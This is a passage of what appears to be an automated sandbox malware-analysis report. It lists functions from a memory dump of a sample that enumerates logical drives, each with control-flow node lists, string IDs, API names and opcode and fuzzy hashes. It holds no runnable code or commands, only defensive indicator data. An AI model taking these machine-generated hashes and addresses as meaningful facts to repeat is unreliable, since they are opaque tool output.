                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01e1e3c1dd270d6188374d894daabbb3ffda30b65ae9592c6d9b3f2db3965fe2
                                                        • Instruction ID: 63a78379161ae0874a1a5d940ad49d084bdbc4417aba27b41db51ecd1e032539
                                                        • Opcode Fuzzy Hash: 01e1e3c1dd270d6188374d894daabbb3ffda30b65ae9592c6d9b3f2db3965fe2
                                                        • Instruction Fuzzy Hash: 1A51E1EB86C115BCB242C581AB50AFF676EE6C7330F30972AF467D5602E2940F89D179
                                                        Function 070809CF Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 501COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 70809cf-7080afb call 7080a7b 13 7080b07 0->13 14 7080b0c 13->14 15 7080b0d-7080d46 call 7080d43 14->15 16 7080af7-7080b05 14->16 40 7080d4d-7080d65 GetLogicalDrives 15->40 16->13 16->14 42 7080d71-7080fc7 call 7080e99 40->42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: 3d046022549360f7f318a2a9a53e03b1ae4465f7a3a07553c36f95e63f7f77f4
                                                        • Instruction ID: 53b9f22d8a9ffddee45316f16d2ca8a4b90255833e6161de970d7638235dfe8e
                                                        • Opcode Fuzzy Hash: 3d046022549360f7f318a2a9a53e03b1ae4465f7a3a07553c36f95e63f7f77f4
                                                        • Instruction Fuzzy Hash: 97918DEB26C225BD7182A5856B54AFFA76EE5C3730B30C637F897D6602E2C84A4D1071
                                                        Function 070809E5 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 491COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 68 70809e5-7080afb call 7080a7b 79 7080b07 68->79 80 7080b0c 79->80 81 7080b0d-7080d46 call 7080d43 80->81 82 7080af7-7080b05 80->82 106 7080d4d-7080d65 GetLogicalDrives 81->106 82->79 82->80 108 7080d71-7080fc7 call 7080e99 106->108
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: b18054ad9534867e51e3a86bc38c6fab224dd9f0cf92e6be0ccbb27e5c341750
                                                        • Instruction ID: 4a89c8e04a0a69dc7092aed812e49df6eb38ff1673507da35d4812495a21fb3c
                                                        • Opcode Fuzzy Hash: b18054ad9534867e51e3a86bc38c6fab224dd9f0cf92e6be0ccbb27e5c341750
                                                        • Instruction Fuzzy Hash: 7591AFEB25C225BDB282A5856B54AFF676EE5C3730B30C537F897D6602E2C84E4E1071
                                                        Function 07080A0D Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 489COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 134 7080a0d-7080a0e 135 70809ad-70809ce call 70809cf 134->135 136 7080a10-7080afb call 7080a7b 134->136 135->134 150 7080b07 136->150 151 7080b0c 150->151 152 7080b0d-7080d46 call 7080d43 151->152 153 7080af7-7080b05 151->153 177 7080d4d-7080d65 GetLogicalDrives 152->177 153->150 153->151 179 7080d71-7080fc7 call 7080e99 177->179
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: 0a2753e1fe48ca1a9361995ed9a850e675ce32ec5854b5ef6562a797c80ee885
                                                        • Instruction ID: 7be36ddfef075a0304875ac18413fb14c64fe573b11a33a5d309931ff685dcd1
                                                        • Opcode Fuzzy Hash: 0a2753e1fe48ca1a9361995ed9a850e675ce32ec5854b5ef6562a797c80ee885
                                                        • Instruction Fuzzy Hash: 1991CEEB25C121BDB182A5856F64AFF676EE5C3730B30C637F893D6602E2C84A4D1031
                                                        Function 07080A37 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 484COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 205 7080a37-7080a3b 206 7080a3d-7080afb call 7080a7b 205->206 207 7080a00-7080a32 205->207 217 7080b07 206->217 207->206 218 7080b0c 217->218 219 7080b0d-7080d46 call 7080d43 218->219 220 7080af7-7080b05 218->220 244 7080d4d-7080d65 GetLogicalDrives 219->244 220->217 220->218 246 7080d71-7080fc7 call 7080e99 244->246
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: f2514578d1776e04ba90f11672606ec91aa8bb13dd95d32049dffca70dfe0957
                                                        • Instruction ID: 9d698ae8f0dddf7ff25ac701082452369aa7e23214207b353043051da69b0d2a
                                                        • Opcode Fuzzy Hash: f2514578d1776e04ba90f11672606ec91aa8bb13dd95d32049dffca70dfe0957
                                                        • Instruction Fuzzy Hash: 29919EEB26C125BDB282A5856B54AFF676EE5C3730B30C637F897D6602E2C84A4D1071
                                                        Function 07080A21 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 473COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 272 7080a21-7080afb call 7080a7b 282 7080b07 272->282 283 7080b0c 282->283 284 7080b0d-7080d46 call 7080d43 283->284 285 7080af7-7080b05 283->285 309 7080d4d-7080d65 GetLogicalDrives 284->309 285->282 285->283 311 7080d71-7080fc7 call 7080e99 309->311
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: 4c3000a1230f04a76670106ec3b7b3208a561a2002c9a7c2fc6e868c290cbcea
                                                        • Instruction ID: e1898646007b4ce9574e1369faa5efea7416261241f6b7dfceb1564b61a05da4
                                                        • Opcode Fuzzy Hash: 4c3000a1230f04a76670106ec3b7b3208a561a2002c9a7c2fc6e868c290cbcea
                                                        • Instruction Fuzzy Hash: EE91ADEB25C125BDB182A5856B64AFF676EE5C3730B30C637F897D6602E2C84A4D1031
                                                        Function 07080A7B Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 431COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 337 7080a7b-7080afb 342 7080b07 337->342 343 7080b0c 342->343 344 7080b0d-7080d46 call 7080d43 343->344 345 7080af7-7080b05 343->345 369 7080d4d-7080d65 GetLogicalDrives 344->369 345->342 345->343 371 7080d71-7080fc7 call 7080e99 369->371
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959
                                                        • Opcode ID: 793c5b3a804def731f0a3cbd4694eed6df7cd1ea5369177be4462732bdb91f35
                                                        • Instruction ID: b2fddd71afda56f7784380e6a9110bcf41f18fe40ec221aa0d840a8706418c20
                                                        • Opcode Fuzzy Hash: 793c5b3a804def731f0a3cbd4694eed6df7cd1ea5369177be4462732bdb91f35
                                                        • Instruction Fuzzy Hash: BC819DEB25C125BDB182A5856B64AFF676EE5C3730B30C637F897D2602E2C84A4D5071
                                                        Function 07080A8A Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 427COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 397 7080a8a-7080afb 402 7080b07 397->402 403 7080b0c 402->403 404 7080b0d-7080d46 call 7080d43 403->404 405 7080af7-7080b05 403->405 429 7080d4d-7080d65 GetLogicalDrives 404->429 405->402 405->403 431 7080d71-7080fc7 call 7080e99 429->431
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959
                                                        • Opcode ID: d5eed1113e1a4df77416b0924905561ef27ea5e5ac86e6a9ccab60905ef7c337
                                                        • Instruction ID: 2b210b1c2acdf2a82846f00cce92d6eb8c0086c520c2a276f1a27f556c032f5c
                                                        • Opcode Fuzzy Hash: d5eed1113e1a4df77416b0924905561ef27ea5e5ac86e6a9ccab60905ef7c337
                                                        • Instruction Fuzzy Hash: 2481AEEB25C125BDB182A5856F64AFF676EE6C3730B30C537F897D2602E2C84A4D5031
                                                        Function 07080B21 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 416COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 516 7080b21-7080b22 517 7080b2e-7080b34 516->517 518 7080b24 516->518 521 7080b35-7080d46 call 7080d43 517->521 519 7080abe-7080afb 518->519 520 7080b26-7080b2a 518->520 524 7080b07 519->524 520->517 549 7080d4d-7080d65 GetLogicalDrives 521->549 526 7080b0c 524->526 528 7080b0d-7080b1c 526->528 529 7080af7-7080b05 526->529 528->521 529->524 529->526 551 7080d71-7080fc7 call 7080e99 549->551
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: d1166a3598c33bcddfe24ad55b6337886d5fb5f6803a0978165ce881085c3325
                                                        • Instruction ID: 70090084a234a99d0a0cf24fb95df7fb04fa6d84337f6e39c8d5f5a5677a635f
                                                        • Opcode Fuzzy Hash: d1166a3598c33bcddfe24ad55b6337886d5fb5f6803a0978165ce881085c3325
                                                        • Instruction Fuzzy Hash: 0A81E1EB25C215BD7182E5856B54AFF676EE6C3730B30C627F897C6602E2C84E4D5071
                                                        Function 07080AA0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 416COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 457 7080aa0-7080afb 461 7080b07 457->461 462 7080b0c 461->462 463 7080b0d-7080d46 call 7080d43 462->463 464 7080af7-7080b05 462->464 488 7080d4d-7080d65 GetLogicalDrives 463->488 464->461 464->462 490 7080d71-7080fc7 call 7080e99 488->490
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: ff28c5f40fe2743db0e11719515e60f4c482a62900ae534b18bdda2d757af714
                                                        • Instruction ID: 0278cc8e2cf218cbf53980cf2cdb5ab2c8c224938013c5a419e11b5344e6efb4
                                                        • Opcode Fuzzy Hash: ff28c5f40fe2743db0e11719515e60f4c482a62900ae534b18bdda2d757af714
                                                        • Instruction Fuzzy Hash: 0D81B0EB25C125BDB182A5856B54AFF676EE5C3730B30C637F897D2602E2C84A4D5071
                                                        Function 07080AA8 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 413COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 577 7080aa8-7080afb 580 7080b07 577->580 581 7080b0c 580->581 582 7080b0d-7080d46 call 7080d43 581->582 583 7080af7-7080b05 581->583 607 7080d4d-7080d65 GetLogicalDrives 582->607 583->580 583->581 609 7080d71-7080fc7 call 7080e99 607->609
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959
                                                        • Opcode ID: ceff69ebb5fdfce9334cbff223f333e4c7eafd14bfa47a6c34b5cf9c28829414
                                                        • Instruction ID: 0fc2e8e3979dab27273675f604f6dc16c2b7d3539a050d2f78a48884d9b59b64
                                                        • Opcode Fuzzy Hash: ceff69ebb5fdfce9334cbff223f333e4c7eafd14bfa47a6c34b5cf9c28829414
                                                        • Instruction Fuzzy Hash: 4681C0EB25C125BDB182A5856B54AFF676EE6C3730B30C637F897D2602E2C84A4D5071
                                                        Function 07080B3D Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 635 7080b3d-7080b40 636 7080adb-7080afb 635->636 637 7080b42-7080b44 635->637 638 7080b07 636->638 639 7080b46-7080d46 call 7080d43 637->639 640 7080b0c 638->640 665 7080d4d-7080d65 GetLogicalDrives 639->665 642 7080b0d-7080b38 640->642 643 7080af7-7080b05 640->643 642->639 643->638 643->640 667 7080d71-7080fc7 call 7080e99 665->667
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: 46fb67051471279d9f375235b552a2e663adb34ccfbecd257d04f43f07b2d248
                                                        • Instruction ID: c8c3a8b92473b4b844584941881957de61f04d60b75996d0620acc92c6113337
                                                        • Opcode Fuzzy Hash: 46fb67051471279d9f375235b552a2e663adb34ccfbecd257d04f43f07b2d248
                                                        • Instruction Fuzzy Hash: 4271D2EB25C115BD7182A5856B54FFF676EE6C3730B30C627F897D2602E2C84A4D5031
                                                        Function 07080AD3 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 396COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 693 7080ad3-7080afb 694 7080b07 693->694 695 7080b0c 694->695 696 7080b0d-7080d46 call 7080d43 695->696 697 7080af7-7080b05 695->697 721 7080d4d-7080d65 GetLogicalDrives 696->721 697->694 697->695 723 7080d71-7080fc7 call 7080e99 721->723
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959
                                                        • Opcode ID: 2ba53cf96ef1726615f0403beb94f2cba733fd250edb4150225ed4af46f772f1
                                                        • Instruction ID: 40a7459da4c58810e055c7a74e578c060cf967a4c18f26ec1d409d36de8607a3
                                                        • Opcode Fuzzy Hash: 2ba53cf96ef1726615f0403beb94f2cba733fd250edb4150225ed4af46f772f1
                                                        • Instruction Fuzzy Hash: E871C1EB25C215BD7282A5856B54AFF6B6EE6C3730B30C637F897D2602E2C84E4D5031
                                                        Function 07080B00 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 394COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 749 7080b00-7080b05 750 7080b0c 749->750 751 7080b07 749->751 752 7080b0d-7080d46 call 7080d43 750->752 753 7080af7-7080aff 750->753 751->750 776 7080d4d-7080d65 GetLogicalDrives 752->776 753->749 778 7080d71-7080fc7 call 7080e99 776->778
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 786e5c180543ef0a640b7fc631988e8f9acf716a459861d5321296d0c95bff80
                                                        • Instruction ID: ecb15ba4e2e02bf5f0f86f3b6fb63191e650b68699771c0a13d77766f3be9353
                                                        • Opcode Fuzzy Hash: 786e5c180543ef0a640b7fc631988e8f9acf716a459861d5321296d0c95bff80
                                                        • Instruction Fuzzy Hash: 6271C1EB15C114BDB282A5856F54EFF676EE6C3730B30C627F8A7D2602E2D84A4D5131
                                                        Function 07080B12 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 378COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 804 7080b12-7080d46 call 7080d43 827 7080d4d-7080d65 GetLogicalDrives 804->827 829 7080d71-7080fc7 call 7080e99 827->829
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 91f00276a7cb11664c52bfbdb79bf0ce016d4b78ab055c20720c5c4176f3e69e
                                                        • Instruction ID: 5f16206c1ce7e1f3872c0cc1e46d9bbdedb51e84df975a06469921ba2455fccb
                                                        • Opcode Fuzzy Hash: 91f00276a7cb11664c52bfbdb79bf0ce016d4b78ab055c20720c5c4176f3e69e
                                                        • Instruction Fuzzy Hash: FF71AEEB26C114BDB182A5856B54AFF676EE6C3730B30C627F8A7D2602E2D84A4D5031
                                                        Function 07080B4E Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 368COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 855 7080b4e-7080d46 call 7080d43 875 7080d4d-7080d65 GetLogicalDrives 855->875 877 7080d71-7080fc7 call 7080e99 875->877
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 99e04356cfee18507430e58ba1df986bab54fc5612eca9b69110772acfbe5459
                                                        • Instruction ID: 3629e4720873efd75cf97e55e4791f4fc6c0a09ea99e45b45c771f1ffc8795a8
                                                        • Opcode Fuzzy Hash: 99e04356cfee18507430e58ba1df986bab54fc5612eca9b69110772acfbe5459
                                                        • Instruction Fuzzy Hash: BA61B0FB25C114BDB292A5856B54AFF676EE6C3730B30C637F8A7D2602E2D84A4D5031
                                                        Function 07080B74 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 352COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: a3d2ee8cafdec1c49b25125f169d27eae148e15d1b119d8cda749d19f07f3733
                                                        • Instruction ID: 9c66a3174abe80b1eb718ef8c237ed33300ee4afd203cc0f4395026b3d695162
                                                        • Opcode Fuzzy Hash: a3d2ee8cafdec1c49b25125f169d27eae148e15d1b119d8cda749d19f07f3733
                                                        • Instruction Fuzzy Hash: AE61C4EB11C114BDB292A5856B54AFF676EE6C3730B30C537F897D2602E2D84A4D5031
                                                        Function 07080BBE Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 6bf7a3b3a3356b6cb494f6bd3185e20bf5edaa665b6d6b7536b1dc471f916f87
                                                        • Instruction ID: d87104058eb573d329c44d8ff01f6e4b31a14385a44a006ebe77fb6efff5538b
                                                        • Opcode Fuzzy Hash: 6bf7a3b3a3356b6cb494f6bd3185e20bf5edaa665b6d6b7536b1dc471f916f87
                                                        • Instruction Fuzzy Hash: 4D51B3EB12C114BDB192A5856B54BFF676EE6C7730B30C627F8A7D2602E2D84A4D5031
                                                        Function 07080C66 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 311COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: b2638eca1848bd0f877ffd481e2c7be6d68bf889535dfcbf440b171477b3db52
                                                        • Instruction ID: 154dac4e9e113105538010a8424159b10852bedac89187e4a85a6bb46f63ab36
                                                        • Opcode Fuzzy Hash: b2638eca1848bd0f877ffd481e2c7be6d68bf889535dfcbf440b171477b3db52
                                                        • Instruction Fuzzy Hash: 9351F1FB12C214BDB282A5856B54BFF6B6DE6C7730B30C627F8A7C2502E2D84A4D5031
                                                        Function 07080BD1 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 308COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 2463c0f3e360649832adb1e583134cc450456747d4bc0b4bfaa167fdd0487580
                                                        • Instruction ID: 49388e103639fb419ce1e73221df14475e1b7bf480c77f8ef7599d4e524c28ee
                                                        • Opcode Fuzzy Hash: 2463c0f3e360649832adb1e583134cc450456747d4bc0b4bfaa167fdd0487580
                                                        • Instruction Fuzzy Hash: 5F51C4EB11C114BDB192A5856B54BFF6B6DE6C7730B30C627F8A7D2602E2D84A4D5031
                                                        Function 07080BDC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 4efde310d841622dd28c511cce34c52f3950aa311b5612d1ca2b9662eabb9866
                                                        • Instruction ID: 06eaa423afad855ba3782debc83fda6a45e3d7c8f2393dbea3dccf9571aa0155
                                                        • Opcode Fuzzy Hash: 4efde310d841622dd28c511cce34c52f3950aa311b5612d1ca2b9662eabb9866
                                                        • Instruction Fuzzy Hash: 8F51C2EB12C214BDB292A5856B54BFF676DE6C3730B30C637F8A7D2602E2D84A4D5031
                                                        Function 07080C0A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 301COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: a3b1262c377b01ddeea6712f91d1cb855b8dfec6f8272077898be601f4c2d822
                                                        • Instruction ID: b9be1267f7c7d5c8d07bf6e909f5ee3a72dedf161e6ce6115af1fd49637af9fd
                                                        • Opcode Fuzzy Hash: a3b1262c377b01ddeea6712f91d1cb855b8dfec6f8272077898be601f4c2d822
                                                        • Instruction Fuzzy Hash: B451C0EB11C214BDB292A5856B54BFF6B6DE6C7730B30C627F8A7D2502E2D84A4D5031
                                                        Function 07080C25 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 297COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 013b80e5ca93591ce62ce6c1392c73a0de5c9f76910e31c8265e7635b93ac25f
                                                        • Instruction ID: 540e8fb2ca82ae613d90e26286135f6dfe321e0220f461b0ab76947f03d265d4
                                                        • Opcode Fuzzy Hash: 013b80e5ca93591ce62ce6c1392c73a0de5c9f76910e31c8265e7635b93ac25f
                                                        • Instruction Fuzzy Hash: AD51C0FB11C214BDB292A5856B54BFF6B6DE6C3730B30C627F8A7D2502E2D84A4D5031
                                                        Function 07080C81 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 686e115ce428a4b2290c82560812c127b0fdd216cfee3a7201ecdf1d101c8223
                                                        • Instruction ID: 30f60fbae6194746cf809c20d1fa618d10d442e245438296edf4e89178b0d07b
                                                        • Opcode Fuzzy Hash: 686e115ce428a4b2290c82560812c127b0fdd216cfee3a7201ecdf1d101c8223
                                                        • Instruction Fuzzy Hash: 795193EB12C214BDB192A5856B54BFF676DE6C7730B30C537F897D2502E2D84A4D5031
